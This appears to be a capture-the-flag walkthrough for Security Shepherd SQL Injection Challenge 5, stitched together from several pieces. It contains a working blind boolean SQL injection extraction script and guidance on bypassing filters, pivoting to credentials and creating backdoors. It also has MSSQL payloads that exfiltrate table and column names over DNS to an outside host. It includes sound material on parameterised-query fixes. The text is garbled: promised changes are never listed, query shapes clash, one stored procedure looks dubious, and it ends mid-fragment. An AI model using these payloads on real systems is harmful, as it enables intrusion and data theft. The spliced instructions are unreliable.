SQL Injection Challenge 5 - Security Shepherd (new version)

You will notice the keyword "new" appearing frequently in search queries. Historically, earlier versions of Security Shepherd (pre-2021) had a relatively straightforward SQLi in Challenge 5. However, the "new" iteration—updated for modern OWASP Top 10 compliance—introduced three critical changes:

These changes force the attacker to use blind, boolean-based, case-shifted injection.

You realize that backslashes (\) are not filtered. In MySQL, a backslash escapes the following character. But here, you don’t need quotes if you can inject without them.

You recall that LIKE clauses can use wildcards: % (any characters) and _ (single character). The filter allows % and _ because they’re not letters/digits/spaces.

Try searching for:
% (just a percent sign)

Query becomes:
SELECT note FROM notes WHERE user_id = 2 AND note LIKE '%%%', which matches all notes (consecutive % wildcards are equivalent to a single % in most SQL dialects). Result: only the guest's notes appear, not the admin's, because user_id = 2 is hardcoded in the query.


Doing this manually takes hours. Use a Python script with requests and a character-by-character search loop:

import requests

url = "http://localhost:8080/challenge5.jsp"
flag = ""
position = 1

while True:
    for ascii_val in range(32, 127):
        char = chr(ascii_val)
        # Blind boolean payload: /**/ comments stand in for spaces, keywords are case-shifted
        payload = f"1'/**/aNd/**/(SeLeCt/**/SuBsTrInG(flag,{position},1)/**/FrOm/**/users/**/LiMiT/**/0,1)/**/=/**/'{char}'-- -"
        params = {"userid": payload}
        resp = requests.get(url, params=params)

        if "User Found" in resp.text:
            flag += char
            print(f"Found: {flag}")
            position += 1
            break
    else:
        # No more characters found
        print(f"Final flag: {flag}")
        break

Once you successfully extract the data, the flag for Security Shepherd Challenge 5 usually follows the format: OSWE-<Random_Hash> or shepherd_<alphanumeric>.

Example found in walkthroughs: OSWE-5d41402abc4b2a76b9719d911017c592

As a developer, how do you prevent the exact exploit we just used? The "new" Security Shepherd challenge teaches you that blacklisting (filtering SELECT, spaces, uppercase) fails. The only fix is parameterized queries (prepared statements).

Vulnerable Code (Java JSP):

String query = "SELECT * FROM users WHERE id = '" + request.getParameter("userid") + "'";
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery(query);

Fixed Code:

String query = "SELECT * FROM users WHERE id = ?";
PreparedStatement pstmt = conn.prepareStatement(query);
pstmt.setString(1, request.getParameter("userid"));
ResultSet rs = pstmt.executeQuery();

Notice how the fixed code requires zero filters. It separates logic from data entirely.
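Added example, not code from the page or from Security Shepherd: a Python stand-in with an in-memory SQLite table (the table layout, flag value and blacklist are assumptions) that runs a probe shaped like the payload above against both the concatenated query and the parameterised one, showing why the blacklist is not a fix while the bound parameter never reaches the SQL parser.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge database; the table layout,
# the flag value and the filter are assumptions, not Security Shepherd's code.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT, flag TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("1", "guest", "OSWE-constructed"), ("2", "admin", "OSWE-other")])
    return conn

# Blacklist of the kind the page describes: case-sensitive keyword matching,
# so SeLeCt and aNd pass straight through (the page's filter also strips spaces,
# which the /**/ comments below sidestep).
BLOCKED = ("SELECT", "UNION", "AND", "OR")

def blacklist_passes(userid):
    return not any(word in userid for word in BLOCKED)

def lookup_vulnerable(conn, userid):
    """Filter + string concatenation: the caller's text is parsed as SQL."""
    if not blacklist_passes(userid):
        return []
    query = f"SELECT name FROM users WHERE id = '{userid}'"
    return [row[0] for row in conn.execute(query)]

def lookup_fixed(conn, userid):
    """Parameterised query: the text is bound as data and never parsed as SQL."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE id = ?", (userid,))]

def boolean_probe(char):
    """Case-shifted, comment-separated probe shaped like the page's payload.
    SQLite spells the function substr(); MySQL uses SUBSTRING()."""
    return (f"1'/**/aNd/**/(SeLeCt/**/SuBsTr(flag,1,1)/**/FrOm/**/users"
            f"/**/LiMiT/**/0,1)/**/=/**/'{char}'-- -")

def demo():
    conn = make_db()
    hit, miss = boolean_probe("O"), boolean_probe("X")
    return {
        "filter_passes": blacklist_passes(hit),      # True: the blacklist is blind to it
        "vuln_hit": lookup_vulnerable(conn, hit),    # ['guest']: oracle says first char is O
        "vuln_miss": lookup_vulnerable(conn, miss),  # []: oracle says no
        "fixed_hit": lookup_fixed(conn, hit),        # []: no row has that literal id
        "fixed_miss": lookup_fixed(conn, miss),      # []: same answer, so no oracle exists
        "fixed_legit": lookup_fixed(conn, "1"),      # ['guest']: normal lookups still work
    }
```

The difference between vuln_hit and vuln_miss is the boolean oracle the script above relies on; the fixed lookup returns the same empty result for both probes, so there is nothing left to extract.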

  • Bypass input filters
  • Extract data via blind methods
  • Time-based: cause delays when the condition is true:
  • Advanced extraction
  • Pivot to privileged data (user credentials, admin flags).
  • If stacked queries are allowed, run additional SELECTs/INSERTs/UPDATEs to escalate or create backdoors.
  • Consider out-of-band exfil (DNS exfiltration) if network/DNS callbacks are possible.
  • Maintain stealth/efficiency


  • First, find the table and column names.

    Payload to get first table name:

    ' OR 1=1; DECLARE @t nvarchar(4000); SET @t = (SELECT TOP 1 table_name FROM information_schema.tables); EXEC xp_dnsresolve @t + '.collab.com' --
    

    DNS Log result: secret_table.collab.com

    Payload to get column names from secret_table:

    ' OR 1=1; DECLARE @c nvarchar(4000); SET @c = (SELECT TOP 1 column_name FROM information_schema.columns WHERE table_name='secret_table'); EXEC xp_dnsresolve @c + '.collab.com' --
    

    Repeat by modifying TOP 1 to TOP 2, etc., or use a loop. You'll discover columns like id, secret_key.

The first step is always to determine how the application handles our input.

  • Single Quote Test: Enter '.